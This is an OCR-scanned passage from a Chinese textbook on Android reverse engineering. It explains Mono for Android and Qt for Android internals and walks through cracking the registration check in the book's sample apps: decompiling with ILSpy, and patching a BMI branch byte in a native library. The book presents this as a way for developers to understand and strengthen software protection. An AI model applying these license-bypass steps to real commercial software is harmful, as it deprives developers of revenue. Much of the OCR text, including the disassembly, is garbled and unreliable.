解决 方案 名 E): J] Create directory for solution 
工程 将 被 保存 在 C: documents 


图 9-17 使 用 MonoDevelop 创 建 Android 工 程 


在 安装 测试 MonoDevelop 开 发 的 Android 程 序 时 ，MonoDevelop 会 自动 
向 AVD 中 安装 Mono for Android 运 行 时 环境 。 其 实 就 是 两 个 apk 文 件 ， 一 个 是 
与 系统 版 本 相关 的 Mono.Android.Platform.apk， 它 提供 了 对 不 同 版 本 SDK 特 
性 的 支持 ， 如 Android v4 控件 、GoogleMaps、OpenTK 的 支持 ; 另 一 个 是 后 
处 理 器 相关 的 运行 库 ，Mono for Android SDK 中 提供 了 对 armeabi、armeabi- 
v7a、x86 这 3 种 处 理 器 指令 集 的 支持 ， 所 有 的 运行 库 的 文件 名 都 以 
“Mono.Android.DebugRuntime-” 开 头 ， 例 如 ARM 指 令 集 的 手机 需要 安装 的 运 
行 库 为 Mono.Android.DebugRuntimearmeabi.apk， 这 个 运行 库 实 际 上 是 .NET 
的 运行 环境 ， 包 含 了 所 有 的 .NET 程 序 集 (.NET 平 台 的 DLL 动态 链接 库 英 文 
称 为 Assembly， 中 文 称 之 为 程序 集 ) 。 运 行 库 安装 完成 后 就 可 以 在 AVD 中 
调试 Mono for Android 程 序 了 。 

发 布 Mono for Android 程 序 需 要 获取 商业 授权 许可 ， 否 则 是 无 法 生成 发 
布 版 apk 文 件 的 ， 只 能 生成 在 模拟 器 上 运行 的 测试 版 apk 文 件 。 无 论 是 发 布 
版 还 是 测试 版 ， 在 Mono for Android 生 成 的 apk 文 件 的 lib 目 录 中 ， 都 有 一 个 
libmonodroid.so 动 态 库 ， 该 文件 就 是 Mono for Android 程 序 运 行 的 基础 。 测 
试 版 的 apk 文 件 中 ， 该 文件 主要 是 通过 与 前 面 介 绍 的 两 个 apk 运 行 环境 通信 


来 执行 程序 功能 的 ， 本 质 上 它 就 是 一 个 负责 功能 转发 的 “ 空 壳 ”， 目 前 ARM 
架构 版 本 的 该 文件 大 小 为 63976 字 节 。 发 布 版 的 apk 文 件 中 ，libmonodroid.so 
不 再 需要 与 前 面 介 绍 的 运行 环境 进行 通信 ， 自 身 就 拥有 了 所 需要 的 全 部 功 
能 。 文 件 大 小 也 增加 到 了 2.66 MB ， 而 且 发 布 版 的 apk 文 件 中 多 出 了 一 个 
assemblies 目 录 ， 它 里 面 存 放 着 软件 运行 时 所 需 的 DLL 动态 链接 库 。 

本 小 节 的 实例 sharpapp 为 一 个 Mono for Android 开 发 的 发 布 版 程序 ， 在 
AVD 上 运行 效果 如 图 9-18 所 示 ， 点 击 按钮 ， 会 弹出 “unregister version!” 的 提 
7]vo 
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unregister version! 


图 9-18 Mono for Android 演 示 程 序 


现在 我 们 的 需求 是 : 破解 该 软件 ， 使 其 成 为 “正式 ”版 。 


下 面 开 始 动 手 ， 首 先 使 用 dex2jar 将 本 小 节 实 例 com.droider.sharpapp.apk 
转换 成 jar 文 件 ， 然 后 使 用 jd-gui 定 位 到 sharpapp 类 的 OnCreate (方法 。 如 图 9- 
19 所 示 ，OnCreate() 方 法 的 实现 转移 到 了 Native 的 n_onCreate() 方 法 中 。 


W' Java Decompiler - Áctivityl.class 


File Edit Navigate Search Help 
CA- EAR 


com.droider.sharpapp_signed.apk.dex2jar.jar x 


) $ android. runtime 
) EJ com. droider. sharpapp 


由 |J] MonoPackageManager Resources 
E [D] NonoRuntimeProvider 
)- $ opentk 
H3 opentk 1 0 
J HH sharpapp 
S- [D Activityl 
日 -加 Activityl 
A5 md methods : String 
â reflist : ArrayList 
Activityl O 
monodroidAddReference(Übject) : void 
monodroidClearReferences () 
n onCreate (Bundle) 
onCreate (Bundle) 
g L.] 


: void 
; void 
void 


Activity 1.class 


x | IGCUserPeer.class 


) 


t 
if (getClass() == Activityl.class) 
{ 
Übject[] array0f0bject = new Object[0]; 
TypeManaqer.Activate("sharpapp.Activityl, sharpapp, Version-1.0.0.0, Culture-neutra: 
} 
} 


private native void n onCreate(Bundle paramBundle); 


public void nonodroidAddReference(0bject paramübject) 
; if 人 this.refList == null) 
^ ArrayList localàrraylist = new AÀrrayLlistí); 
this.reflist = localàrraylist; 
banus bool = this.refLlist.addí(paramÜübject); 
H 


public void monodroidClearReferences() 
{ 
if (this.refList != null) 
this.reflist.clear():; 


} 


public void onCreate(Bundle paramBundle) 
{ 


n onCreate(paramBundle); 
} 


图 9-19 ”使 用 jd-gui 分 析 反 编译 的 jar 文 件 


再 来 看 下 面 的 代码 : 


static final String . md methods = 
"n onCreate: (Landroid/os/Bundle;)V:GetOnCreate Landroid os Bundle 
Handler\n"; 
static 
( 
String str - md methods; 
Runtime.register( 
"sharpapp.Activityl, sharpapp, Version-1.0.0.0, Culture=neutral, 
PublicKeyToken-null", 
Activityl.class, str); 
) 
public Activityl() 
{ 
if (getClass() == Activityl.class) 
( 
Object[] arrayOfObject = new Object[0]; 
TypeManager.Activate( 
"sharpapp.Activityl, sharpapp, Version-1.0.0.0, Culture-neutral, 
PublicKeyToken-null", 
"", this, arrayOfObject); 


) 

看 到 这 段 代 码 读者 肯定 会 觉得 奇怪 ， 在 代码 初始 化 的 时 候 调 用 了 两 个 
奇怪 的 方法 。 首 先是 Runtime 类 的 register() 方 法 ， 它 的 作用 是 向 Dalvik 运 行 环 
境 注 册 sharpapp.Activity1 类 。 为 什么 要 注册 这 么 一 个 类 呢 ? 其 实 ， 每 一 次 调 
用 托管 代码 (本 书 所 讲 的 托管 代码 均 指 C# 语 言 编写 的 代码 ) 编写 的 方法 
时 ，Mono for Android 运 行 环境 都 需要 先 调 用 在 Java 层 提供 的 一 段 代理 方法 
的 代码 (这 里 的 代理 指 的 是 它 不 是 直接 的 功能 代码 ， 而 是 功能 代码 的 调用 
代码 。) ， 这 上段 Java 代 理 代码 的 方法 声明 与 托管 代码 的 方法 声明 完全 一 致 ， 
并 且 两 者 的 基 类 与 构造 函数 也 完全 相同 ， 这 样 Mono for Android 运 行 环境 就 
知道 了 需要 调用 的 是 哪个 托管 方法 ， 虽然 抛 了 个 大 弯 ， 但 还 是 达到 了 调用 
托管 代码 的 目的 。 这 种 代理 方法 的 技术 在 Mono for Android 中 叫做 ACW 

(Android callable wrappers，Android 调 用 包装 器 ) 。 这 样 问题 就 来 了 ， 每 
一 个 托管 代码 实现 的 虚 方 法 或 接口 方法 都 有 一 个 ACW， 难 不 成 使 用 C# 写 个 
Android 程 序 ， 还 需要 另外 与 一 份 Java 代 码 ? 其 实 完全 没有 这 个 必要 ， 因 为 


这 段 代 码 对 开发 人 员 来 说 是 不 可 见 的 ， 在 编译 生成 apk 文 件 时 ， 
monodroid.exe 会 自动 为 其 生成 ACW 代 码 。 代 码 中 另外 一 个 被 调用 的 方法 是 
TypeManager 类 的 Activate()， 从 名 称 判 断 ， 它 应 该 执行 一 个 “激活 ”动作 ， 的 
确 没 错 ， 当 启动 Activity1 时 ，Activity1 的 ACW 会 被 调用 ， 首 先 执 行 的 就 是 
它 的 构造 图 数 Activity10， 其 中 调用 Activate(0) 方 法 的 作用 就 是 引发 托管 代码 
的 构造 图 数 被 调用 。 另 外 ，register() 方 法 与 Activate() 方 法 传递 的 第 一 个 参数 
都 是 一 行 长 长 的 字符 串 ， 它 就 是 托管 代码 的 元 数据 (关于 托管 代码 元 数据 
的 介绍 读者 可 以 参看 C# 语 言 的 开发 书籍 ) ， 作 用 就 是 供 运 行 环 境 找到 正确 
的 程序 集 

x-FMono for Android 架 构 方面 的 内 容 笔 者 就 不 再 详 述 了 ， 有 兴趣 的 读 
者 可 以 ii A Bg 75 的 在 线 x 档 
http:/docs.xamarin.comy/android/advanced_topics/architecture 来 了 解 更 多 的 信 
Ri. 

既然 Java 层 的 代码 都 只 是 些 代理 代码 ， 那 我 们 就 可 以 不 用 再 看 它 了 ， 直 
接 查 看 托管 代码 即 可 。 托 管 代码 在 apk 文 件 的 assemblies 目 录 下 ， 本 实例 的 托 
管 代码 在 sharpapp.dll 文 件 中 ， 下 面 的 工作 就 是 分 析 这 个 DLL 了 。.NET 编 程 
语言 的 出 现 已 经 有 些 年 头 了 ， 基 于 该 平台 的 反 编 译 技术 已 经 非常 成 熟 ， 目 
前 有 很 多 优秀 的 反 汇 编 工 具 能 够 直接 反 汇 编 出 .NET 程 序 集 的 源码 ! 笔者 在 
此 推荐 一 款 强 大 的 .NET 反 汇编 工具 ILSpy， 它 是 一 款 开 源 的 .NET 反 汇编 工 
具 ， 官 方 网 站 为 http://ilspy.net。 使 用 编译 好 的 ILSpy.exe 打 开 sharpapp.dll 文 件 
后 ， 反 编译 效果 如 图 9-20 所 示 。 
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图 9-20 ”使 用 ILSpy 反 编译 sharpapp.dll 


至 于 接 下 来 的 破解 已 经 没什么 好 讲 了 ， 直 接 复制 Activity1 的 代码 ， 重 新 
使 用 MonoDevelop 自 己 编写 一 个 同样 功能 的 程序 即 可 。 

Mono for Android 开 发 的 软件 使 用 了 C# 语 言 编写 的 程序 集 作为 其 功能 核 
心 ， 如 果 不 采 用 代码 混 靖 或 其 它 的 保护 手段 ， 则 开发 出 的 商业 软件 之 无 安 
全 性 可 言 。 


9.7.2 Qtfor Android 开 发 的 程序 及 其 破解 方法 


Qt for Android 是 Qt 界面 框架 针对 Android 系 统 的 移植 项 目 ， 该 项 目 命名 
为 Necessitas， 其 官方 网 站 为 http://necessitas.kde.org/。 Necessitas 的 安装 很 简 
单 ， 首 先 从 官网 下 载 它 的 安装 文件 ，Windows 平 台 下 为 一 个 exe 安 装 包 ， 双 
击 运行 安装 包 ， 按 照 向 导 提 示 的 步骤 不 停 地 点 “下 一 步 ? 即 可 安装 完成 。 
Necessitas 目 前 的 最 新 版 本 为 alpha 4.1， 安 装 过 程 会 联网 下 载 所 需要 的 文 


件 ， 整 个 安装 过 程 会 占用 大 约 2.5G 的 磁盘 空间 ， 笔 者 的 XP 虚 拟 机 空间 不 
足 ， 因 此 将 其 安装 到 本 地 的 windows 7 系统 中 。 

Qt for Android 的 集成 开发 环境 是 Qt Creator， 启 动 Qt Creator 后 ， 点 击 菜 
单项 “File New File or Project” 会 弹出 创建 工程 对 话 框 ， 如 图 9-21 所 示 ， 在 
“Files and Classes” 中 选择 “Mobile Qt Application” 后 点 击 Choose 按 钮 就 会 打开 
Android 工 程 创建 向 导 ， 跟 着 向 导 不 停 点 击 “ 下 一 步 ? 就 会 完成 工程 的 创建 。 
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图 9-21 使 用 Qt Creator&!/ Œ Android. T f£ 


编写 Qt for Android 程 序 需要 使 用 C++ 语言 ， 有 过 Qt 开发 经 验 的 读者 可 以 
很 快 上 手 。 下 面 来 看 看 本 小 节 的 实例 程序 Qtandroidapp。 在 AVD 中 安装 该 程 
序 后 ， 首 次 运行 会 弹出 提示 框 请 求 安装 Ministro 服 务 ， 如 图 9-22 所 示 ， 点 击 
OK 按钮 后 ， 程 序 会 并 跳 转 到 Ministro 服 务 程序 的 下 载 页 面 。 
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图 9-22 ”首次 运行 实例 需要 安装 Ministro 服 务 


如 果 AVD 中 没有 安装 Android 市 场 ， 则 程序 会 运行 失败 ， 这 个 时 候 我 们 
可 以 到 Qt for Android 官 方 网 址 
http://files.kde.org/necessitas/installer/release/Ministro%20II.apk 下 载 Ministro 服 
务 程序 后 安装 到 AVD 中 。 再 次 运行 实例 程序 ，Ministro 会 联网 下 载 所 需 的 运 
行 库 ， 如 图 9-23 所 示 。 
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图 9-23 ”Ministro 正 在 下 载 所 需 的 运行 库 


当 运 行 库 下 载 完 后 程序 就 能 正常 运行 了 ， 程 序 正常 启动 后 的 界面 如 图 9- 
24 所 示 。 
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图 9-24 Qt for Android 演 示 程 序 


点 击 执行 功能 后 ， 软 件 会 弹出 程序 未 注册 的 提示 框 ， 我 们 下 面 来 看 看 
如 何 破解 它 。 首 先 使 用 dex2jar 将 Qtandroidapp.apk 转 换 成 jar 文 件 ， 然 后 使 用 
jd-gui 打 开 ， 发 现 com.droiderqtapp 包 下 面 除 了 R 与 BuildConfig 类 外 ， 没 有 其 
它 的 代码 ， 如 图 9-25 所 示 。 


75 Java Decompiler - QtActivity.class 
File Edit Navigate Search Help 


2 A 
Qtandroidapp.apk.dex2jar.jar x 


3-88 android.annotation QtActivity.dass x 


|pacgage org.kde.necessitas.origo; 


*-[J] SuppressLint 


3i-[J] TargetApi 

} com.droider.qtapp Blimport android.app.Activity; 
:i-[J] BuildConfig 
JJ R 


EB org.kde.necessitas 


|public class QtAÀctivity extends Activity 
it 
private static final String APPLICATION PARAMETER. 
private static fi i APP.: > KEY = "app: 


3- ministro 


5-H 


加 IMinistro 
J) IMinistroCallback 


origo 


H-D) QtActivity$1 


因 QtActivity$2 
因 QtActivity$3$1$1 
| QtActivity$3$1 


private static fin 


private static 


private static fi 
private static fi 


private static 
private static 
private static 
private static 


final String ENVIRO 

final String ERROR COD 
final String ERROR MES. 
final int INCOMPATIBLE 


"applicat: 
"bundled.: 


private static final String 

private static final String LOADER CL 

private static final String MAIN LIBRARY 7 KEY 
private static final String MIN JIMUM . MINIS STRO API 


"m 


QtActivity$3 
J| QtActivity$4 
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图 9-25 ”使 用 jd-gui 分 析 反 编译 的 jar 文 件 


Qt for Android 编 写 的 程序 不 以 Activity 为 核心 ， 程 序 的 功能 与 界面 的 显 
示 都 是 依靠 Native 层 的 so 动态 库 ， 下 面 我 们 来 证 实 这 一 点 。 首 先 下 载 
Necessitas 的 源码 ， 目 前 最 新 版 本 为 4.8.2-411 ， 官 方 下 载 地 址 为 
http://files.kde.org/necessitas/sdk alpha4/org.kde.necessitas.android.qt.src/4.8.2- 
411qt-src.7z。 下 载 完 源码 后 我 们 从 QtActivity 的 OnCreate0 开 始 ， 跟 踪 源 码 中 
方法 的 调用 流程 。 

所 有 Qt for Android 程 序 的 zi Activity 为 
“org.kde.necessitas.origo.QtActivity”， 并 且 它 的 代码 是 由 Necessitas SDK 提 供 
的 。 在 OnCreate() 方 法 中 ， 代 码 首 先 设置 程序 的 标题 栏 为 无 标题 ， 然 后 调用 
T startAppO 方法 。startApp0 方 法 会 检查 传递 过 来 的 Intent 是 否 包含 

“use_local_qt_libs” 键 值 ， 其 作用 是 判断 程序 是 否 使 用 本 地 的 Qt 运行 库 ， 如 
果 是 ， 就 收集 本 地 Qt 库 的 信息 ， 最 后 调用 loadApplication0 加 载 程序 ， 反 
之 ， 则 调用 bindSservice0 绑 定 远程 的 Ministro 服 务 ，bindService0 会 判断 是 否 
发 生 异 常 ， 如 果 发 生 异 常 ， 说 明 手 机 可 能 没 —— MiS ， 此 时 会 调 
用 downloadUpgradeMinistro() 弹 出 提示 框 ， 提 醒 用 户 下 载 安 装 Ministro 服 务 


程序 。 当 bindService() 返回 成 功 后 ，mministroConnection 类 的 
onServiceConnected() 方 法 会 被 调用 ， 此 时 代码 会 通过 AIDL 的 方式 调用 
下 口 的 requestLoader0 方 法 ， 并 传递 进去 一 个 IMinistroCallback 回 调 
接口 类 ， 回 调 接口 类 的 loaderReady0 方 法 被 远程 服务 调用 ， 从 而 执行 
QtActivity 类 的 loadApplication)) 73 法 ， loadApplication0 首先 通过 
DexClassLoader 方 式 加 载 QtLoader 类 ， 这 个 QtLoader 类 默认 指定 的 类 名 为 
“org.kde.necessitas.industrius.QtActivityDelegate”， 为 了 便于 描述 ， 下 面 将 该 
类 简称 为 QtActivityDelegate 类 ，QtActivityDelegate 类 的 实现 属于 Qt 运行 库 的 
部 分 ， 位 于 QtIndustrius-14.jar 文 件 中 ， 其 中 14 是 笔者 AVD 上 安装 Qt 依赖 库 时 
下 载 的 版 本 ， 不 同 版 本 的 AVD 可 能 会 有 所 不 同 ， 在 Necessitas 源 码 中 查找 其 
实现 ， 最 终 在 Android\Qt\482\gt-sro\src\android 目 录 下 找到 了 QtIndustrius 工 程 
的 代码 。 

回 到 上 面 的 分 析 ， 当 QtActivityDelegate 类 加 载 完 成 后 ， 
loadApplication() 会 通过 反射 机 制 调 用 其 loadApplication0 方 法 ， 
QtActivityDelegate 的 loadApplication) 方法 会 调 用 QtNative 类 的 
loadQtLibraries() 与 lo0adBundledLibraries() 加 载 Qt 运 行 库 。 接 着 ，QtActivity 的 
loadApplication() 会 调用 QtApplication 类 的 setQtActivityDelegate() 方 法 设置 
Activity 委 托 (委托 即 Delegate 机 制 ， 是 在 .NET 开 发 中 常用 的 一 种 机 制 ， 类 
似 于 Java 的 监听 器 ) ， 该 方法 设置 了 静态 成 员 m_delegateObject 与 静态 成 员 
m_delegateMethods 的 值 ， 前 者 用 来 判断 程序 是 否 已 经 设置 Activity 委 托 ， 后 
者 则 保存 了 已 经 被 委托 的 方法 。 经 过 这 一 步 后 ， 程 序 的 控制 权 就 转移 给 了 
QtActivityDelegate 类 。 接 着 ，loadApplication() 调 用 了 loadLibrary() 来 加 载 自 
身 的 so 动态 库 ， 最 后 调用 了 QtActivityDelegate 类 的 startApplication() 方 法 启动 
程序 。 正 如 前 面 看 到 的 那样 ，QtActivityDelegate 其 实 自己 什么 都 不 做 ， 它 只 
是 个 “ 托 >”， 它 会 调用 QtNative 类 的 startApplication() 方 法 来 执行 程序 ， 该 方法 
为 Native 方 法 ， 其 代码 主要 是 通过 dlopen0 打 开 程 序 自 身 的 so 动态 库 ， 然 后 
调用 dlsym() 查 找 so 动 态 库 的 main 冰 | 数 并 执行 。 

至 此 ，Qt for Android 程 序 的 启动 流程 就 算 弄 明白 了 ， 整 个 过 程 错 综 复 
杂 ， 最 后 只 是 调用 了 程序 本 身 的 运行 库 而 已 。 下 面 理 清 一 下 思路 ， 其 完整 


的 执行 流程 如 图 9-26 所 示 。 
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v 


OtNative.startApplication() 


Y 


Androidjnimain.startQtApplication() 


y 


dlopen(mainLibrary)+dlsym("main") 


图 9-26 ”Qt for Android 程 序 启动 流程 


既然 程序 的 核心 在 so 动态 库 里 面 ， 那 其 它 什 么 的 就 不 去 理会 了 。 使 用 
解压 缩 工具 解压 出 apk 文 件 lib 目 录 下 的 libqtandroidapp.so， 打 开 IDA Pro， 然 


后 并 将 它 拖 入 主 窗口 进行 分 析 。 分 析 Qt 程 序 需 要 读者 事先 了 解 Qt 程序 开发 
的 流程 ， 一 个 典型 的 Qt 程序 的 代码 框架 如 下 : 
int main(int argc, char *argv[]) 
{ 
QApplication app(argc, argv); 
MainWindow mainWindow; 
mainWindow.setOrientation(MainWindow::ScreenOrientationAuto); 
mainWindow.showMaximized(); 


return app.exec(); 
) 


程序 的 界面 显示 与 事件 响应 都 依赖 这 个 MainWindow， 我 们 可 以 在 
MainWindow 的 构造 图 数 中 查找 connect0 图 数 调 用 ， 或 者 逐个 分 析 
MainWindow 类 的 成 员 方 法 。 笔 者 采用 前 一 种 方法 找到 相应 的 反 汇 编 代 码 如 
Fe 


.text:00003B5C ; MainWindow::MainWindow(QWidget *) 
.text:00003B5C EXPORT . ZN10MainWindowClEP7QWidget 
.text:00003B5C  ZN10MainWindowClEP7QWidget 

.text:00003B5C 

.text:00003BB0 

.text:00003BBO0 loc 3BBO 

.text:00003BBO MOVS RO, R5 

.text:00003BB2 BL ZN7QStringD1Ev ; QString::-QString() 
.text:00003BB6 ; ---------------------------2----2------------ 
.text:00003BB6 LDR R3, [R4,#0x14] 


.text:00003BB8 LDR R1, -(a2clicked - 0x3BC6) 
.text:00003BBA MOVS R2, #0 

. text :00003BBC LDR RO, [R3,#0x10] 

.text:00003BBE LDR R3, -(alonbuttonclick - 0x3BC8) 
.text:00003BCO STR R2, [SP,st0x20-*var. 20] 

.text:00003BC2 ADD R1, PC ; "2clicked()" 

. text : 00003BC4 ADD R3, PC ; "lonButtonclicked()" 
.text:00003BC6 MOVS R2, R4 

.text:00003BC8 BL sub 5510 ;调用 QObject::connect () RX 
.text:00003BCC ; ------------------------------------------- 
.text:00003BCC B loc 3BDC 


.text:00003BDC 
.text:00003BDC loc 3BDC 


.text:00003BDC ADD SP, SP, 40x10 
.text:00003BDE MOVS RO, R4 
.text:00003BE0 POP (RA-R6, PC) 


.text:00003BE0 ; End of function MainWindow::MainWindow(QWidget *) 
xx E& 1C 83 3] FH QObject 2$ 69 connect) 函数 将 按钮 的 点 击 事件 与 
onButtonclicked() 方 法 关联 。 其 中 的 “BL sub 5510"PK AGE FHRE RE E, EB 


代码 如 下 。 
.text:00005510 sub_5510 
.text:00005510 BX PC 


.text:00005512 ALIGN 4 
.text:00005512 ; End of function sub 5510 


只 有 一 行 “BX PC” 指 令 ， 就 是 跳 转 到 PC 寄存 器 指向 的 地 址 去 执行 。 可 
PC 寄存 器 的 值 是 多 少 呢 ? 其 实 ， 它 只 是 一 个 桩 函数 ， 仔 细 查 看 IDA Pro 中 反 
汇编 代码 ， 会 发 现 有 很 多 一 样 的 函数 。IDA Pro 非 常 强大 ， 能 够 分 析出 PC 寄 
存 器 将 跳 转 到 何 处 去 执行 。 将 鼠标 在 sub_5510 函 数 名 称 上 点 击 一 下 ， 会 发 
现下 面 有 一 个 函数 的 交叉 引用 已 经 高 亮 显 示 该 水 数 被 sub_5510 调 用 过 ， 如 
图 9-27 所 示 。 


-text:88885518 

-text:88885518 sub 5518 ; CODE XREF: HainVindow::HainWindow(QMidget *)*6CTp 
-text: 880805518 ; HainWindow::MainWindou(QWVidget x)+6CTp 
-text:88885518 BX PC 

CERKES BBOBDOTB. P oon 

-text: 88885512 ALIGN 4 

-text:88885512 ; End of function sub 5518 

text: 888805512 

-text: 88885515 CODE32 

-text:88885514 

.text:B888551^ ; === SUBROUTINE 

-text :00005514 

.-text:00005514 ; Attributes: noreturn 

-text:00005514 

.-text:888805515 sub 5515 ; CODE XREF: sub 55198Tj 

-text:888805515 LDR R12, -( 2N7Qü0bject?connectEPKS PKcS1 S3 N2QtihConnectionTypeE - 60x5528) 
-text:88885518 ADD PC, R12, PC ; Q0bject::connect(Q0bject const, char constx,Q0bject : 
-text:88805518 ; End of function sub 5515 


*tovt-RaRREEA4QO 


图 9-27 IDA Pro 强 大 的 分 析 功 能 


下 面 来 看 onButtonclicked(0) 方 法 的 代码 。 它 的 代码 很 简单 ， 限 于 篇 幅 ， 
笔者 就 不 再 详细 分 析 了 ， 直 接 帖 出 关键 部 分 代码 。 


.text:000035F0 
.text:000035F0 
.text:000035F0 
.text:00003600 
.text:00003602 
.text:00003604 
.text:00003606 
.text:00003608 
.text:0000360A 
.text:0000360C 
.text:0000360E 
.text:00003610 
.text:00003614 
.text:00003616 
.text:00003618 
.text:0000361A 
.text:0000361C 
.text:0000361E 


"utt nn 


.text:0000365C 1oc, 365C 


.text:0000365C 
.text:0000365E 
.text:00003660 
.text:00003662 
.text:00003664 
.ctext:00003666 
.text:00003668 
.text:0000366C 
.text:0000366E 
.text:00003670 
.text:00003672 
.text:00003674 
.text:00003676 


.text:0000368E 
.text:000036BA 
.text:000036BC 
.text:000036BC 


, 


r 


MainWindow::onButtonclicked (void) 
EXPORT JZN10MainWindowl5onButtonclickedEv 
 ZN10MainWindowl5onButtonclickedEv 


LSLS 
BMI 
LDR 
LDR 
ADD 
MOVS 
ADD 
MOVS 
BL 
LDR 
ADD 
MOVS 
ADD 
MOVS 
BL 


LDR 
LDR 
ADD 
MOVS 
ADD 
MOVS 
BL 


BL 


ADD 
POP 


RO, R1, #0x1F 


loc, 365C 

R5, [R3,R2] ; MainWindow::staticMetaObject 
R2, -(aTip - 0x3610) 

RO, SP, f$0x30-var 14 

R1, R5 

R2, PC ; "tip" 

R3, #0 

sub. 52B0 ;tr 

R2, -(aUnregisterVers - 0x361E) 

RO, SP, #0x30+var_18 

Ri, R5 

R2, PC ; "unregister version!" 
R3, #0 

sub 52B0 str 


; CODE XREF: MainWindow::onButtonclicked (void)-*12]j 
R5, [R3,R2] ; MainWindow::staticMetaObject 
R2, -(aTip - 0x3668) 
RO, SP, s4$0x30-var 20 


Ri; R5 

R2, PC ; "tip" 

R3, #0 

sub 52B0 rtr 

R2, -(aThanksForYourR - 0x3676) 

RO, SP, 40x30-var 24 

Ri, R5 

R2, PC ; "thanks for your registration!" 
R3, #0 

sub 52B0 ;tr 

sub 52C0 ;QMessageBox::information 


SP, SP, #0x24 
(RA,R5,PC] 


End of function MainWindow::onButtonclicked(void) 


代码 中 tr0 E QMessageBox:iinformation() 的 分 析 方 法 与 前 面 
QObject::connect() 一 样 ，IDA Pro 已 经 为 它们 给 出 了 交叉 引用 的 注释 。 从 上 
面 的 反 汇 编 代 码 不 难看 出 ， 指 令 *BMI loc_365C” 是 程序 的 破解 关键 点 。BMI 


指令 的 作用 是 判断 比较 结果 是 否 为 负数 〈 即 CPSR 寄 存 器 的 N 位 为 1) 时 进行 
跳 转 。 比 较 的 结果 来 源 于 上 一 条 指令 “LSLS RO, R1, #0x1F”， 对 于 一 个 32 位 
的 数 来 说 ， 左 移 31 位 的 作用 是 检查 数 的 最 低位 是 否 为 1， 如 果 为 1， 则 设置 
符号 位 时 为 负数 ， 即 BMI 指 令 会 满足 跳 转 条 件 ， 否 则 代码 顺序 向 下 执行 。 
破解 该 程序 就 是 要 将 “BMI loc_365C” 修 改 成 “B loc_365C” 无 条 件 跳 转 。 
那 怎么 修改 呢 ? 这 需要 我 们 对 ARM 指 令 集 的 字 节 码 有 所 了 解 。“BMI 
loc_365C” 对 应 的 字 节 码 为 “2B D4”， 其 中 2B 为 基于 当前 地 址 以 2 字 节 为 单位 
的 位 置 偏 移 ，D4 就 是 B(X) 的 指令 Opcode ，X 为 指令 条 件 码 ， 如 EQ、NE、 
MI 等 。B 指 令 的 Opcode 为 E0， 因 此 ， 我 们 只 需 将 “2B D4” 改 为 “2B EO" BI) 
可 。 使 用 C32asm 打 开 libqtandroidapp.so， 修 改 文件 偏 移 0x3603 处 的 D4 为 
E0， 保 存 后 退出 。 将 修改 后 的 libqtandroidapp.so 使 用 解压 缩 工具 导入 到 
Qtandroidapp.apk 文 件 中 ， 重 新 签名 后 在 AVD 中 安装 并 运行 ， 点 击 “ 执 行 功 
能 ”按钮 ， 此 时 会 弹出 感谢 您 注册 的 提示 ， 如 图 9-28 所 示 ， 程 序 完美 地 破解 
了 。 
[Q8 55s4android233 Le] c 
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图 9-28 ”破解 后 的 Qtandroidapp 运 行 效果 


破解 Qt for Android 程 序 完全 是 对 so 动态 库 操 刀 ， 其 破解 难度 比 Java 与 C# 
开发 的 Android 程 序 要 高 很 多 ， 不 过 此 类 的 商业 软件 相对 来 说 比较 少见 。 


9.8 “本章 小 结 


本 章 主 要 介绍 了 Android 商 业 软件 党 用 的 一 些 保护 手法 ， 并 给 出 了 相应 
的 破解 思路 与 方法 。 本 章 的 每 个 小 节 都 通过 实例 破解 的 方式 ， 向 读者 展示 
了 整个 解密 过 程 。 读 者 在 实际 操作 的 过 程 中 ， 要 不 断 的 总 结 ， 通 过 逆向 思 
维 的 方式 找到 反 破 解 的 方法 ， 来 进一步 的 加 强 自身 软件 的 保护 。 


第 10 章 Android 程序 的 反 破 解 技术 


对 于 软件 开发 人 员 来 说 ， 最 痛苦 的 事 莫 过 于 自己 花费 大 量 的 时 间 与 精 
力 ， 平 平 杏 昔 弄 了 大 半年 才 完 成 的 项 目 ， 却 在 短 时 间 内 被 人 破解 了 。 如 何 
防止 软件 被 人 反 编译 ， 保 证 软件 的 核心 代码 不 被 人 剩 穷 ， 我 想 这 应 该 是 作 
为 Android 软 件 开发 者 的 您 最 关心 的 事 吧 ! 

由 于 一 些 客观 原因 ，Android 收 费 软 件 在 国内 几乎 很 难 存活 ，Android 软 
件 的 盈利 模式 多 是 采用 免费 发 布 加 广 告 展示 来 获取 广告 收入 。 人 免费 发 布 的 
软件 没有 任何 的 授权 访问 机 制 来 控制 ， 都 是 直接 暴露 在 互联 网 上 的 ， 任 何 
一 个 想 要 逆向 分 析 该 软件 的 人 ， 都 可 以 从 网 上 直接 下 载 到 apk 文 件 。 既 然 无 
法 从 软件 的 发 布 渠道 保证 其 安全 性 ， 那 就 只 能 从 软件 代码 本 身 着 手 了 。 

回想 一 下 逆向 Android 软 件 的 步骤 : 首先 是 对 其 进行 反 编译 ， 然 后 是 阅 
读 反 汇编 代码 ， 如 果 有 必要 还 会 对 其 进行 动态 调试 ， 找 到 突破 口 后 注入 或 
直接 修改 反 汇编 代码 ， 最 后 重新 编译 软件 进行 测试 。 整 个 过 程 可 分 为 反 编 
译 、 静 态 分 析 、 动 态 调试 、 重 编译 等 4 个 环节 ， 本 章 将 从 这 4 个 环节 出 发 ， 
介绍 如 何在 每 个 环节 中 保护 自己 的 软件 。 


10.1 ”对 抗 反 编译 


对 抗 反 编译 是 措 apk 文 件 无 法 通过 反 编 译 工具 (如 ApkTool、 
BakSmali、dex2jar) 对 其 进行 反 编译 ,或 者 反 编译 后 无 法 得 到 软件 正确 的 
反 汇 编 代 码 。 


10.1.1. 如 何 对 抗 反 编译 工具 


对 抗 反 编译 工具 的 思路 是 : 寻找 反 编译 工具 在 处 理 apk 或 dex 文 件 时 的 
缺陷 ， 然 后 在 自己 的 软件 中 加 以 利用 ， 让 反 编译 工具 处 理 这 些 “ 特 制 * 的 apk 


文件 时 抛 出 异常 而 反 编 译 失 败 。 这 样 编写 出 来 的 软件 能 够 在 手机 上 正常 的 
安装 使 用 ， 但 在 反 编 译 工具 的 眼 里 却 是 一 个 “畸形 ”文件 。 
那 如 何 查找 反 编 译 工 具 的 缺陷 呢 ? 笔者 总 结 了 一 下 ， 有 如 下 两 种 方 
式 : 

1. 阅读 反 编译 工具 源码 

目前 大 多 数 Android 软 件 的 反 汇 编 工 具 都 是 开源 的 ， 这 就 使 得 我 们 可 以 
非常 方便 地 通过 阅读 它们 的 源码 来 查找 缺陷 。 查 找 的 思路 可 以 根据 apk 文 件 
的 处 理 环节 来 展开 ， 例 如 资源 文件 处 理 、dex 文 件 校 验 、dex 文 件 类 代码 解 
